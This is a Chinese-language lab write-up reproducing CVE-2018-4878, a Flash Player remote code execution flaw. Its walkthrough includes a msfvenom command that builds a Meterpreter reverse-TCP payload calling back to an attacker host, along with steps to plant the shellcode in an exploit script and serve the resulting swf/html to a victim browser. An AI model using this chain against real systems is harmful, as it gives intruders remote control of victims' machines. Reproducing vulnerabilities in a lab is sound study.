(CVE-2018-4878)Adobe Flash Player 远程代码执行漏洞

一、漏洞简介

2018年1月31日,韩国CERT发布公告称发现Flash 0day漏洞的野外利用,攻击者执行针对性的攻击;2月1日Adobe发布安全公告,确认Adobe Flash Player 28.0.0.137 及早期版本存在远程代码执行漏洞(CVE-2018-4878);2月2日,Cisco Talos团队发布了事件涉及攻击样本的简要分析;2月7日,Adobe发布了CVE-2018-4878漏洞的安全补丁。

二、漏洞影响

Adobe Flash Player \<= 28.0.0.137

三、复现过程

  • 1.环境 kail: 192.168.184.128 win7sp1: 192.168.184.131 exp: CVE-2018-4878-master.zip flash: AdobeFlashPlayer28.0.0.161正式版.zip
  • 2.利用msfvenom生成对应的shellcode代码
<!-- -->

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.184.128 lport=4444 -f python>shellcode.txt

1.pngAdobeFlashPlayer远程代码执行漏洞/media/rId24.png)

  • 3.进入 CVE-2018-4878-master 目录,编辑CVE-2018-4878.py文件,将msfvenom生成的代码覆盖掉原来的代码

2.pngAdobeFlashPlayer远程代码执行漏洞/media/rId25.png)

  • 4.修改 swf 文件及 html 文件位置

3.pngAdobeFlashPlayer远程代码执行漏洞/media/rId26.png)

  • 5.Python 执行 CVE-2018-4878-master.py 代码,会生成两个文件,一个 swf 文件,一个 html 文件

4.pngAdobeFlashPlayer远程代码执行漏洞/media/rId27.png)

  • 6.把生成的两个文件放到apache web目录下

5.pngAdobeFlashPlayer远程代码执行漏洞/media/rId28.png)

  • 7.通过msf开启反弹sehll监听

6.pngAdobeFlashPlayer远程代码执行漏洞/media/rId29.png)

  • 8.靶机上win7安装存在漏洞的adobe flash player 28.0.0.126

7.pngAdobeFlashPlayer远程代码执行漏洞/media/rId30.png)

  • 9.通过win7自带的ie浏览器进行访问192.168.184.128/index2.html

8.pngAdobeFlashPlayer远程代码执行漏洞/media/rId31.png)

  • 10.Kail上成功获取到meterpreter shell

9.pngAdobeFlashPlayer远程代码执行漏洞/media/rId32.png)

10.pngAdobeFlashPlayer远程代码执行漏洞/media/rId33.png)

Qingy文库 all right reserved,powered by GitbookFile Modify: 2021-07-15 19:47:31

results matching ""

    No results matching ""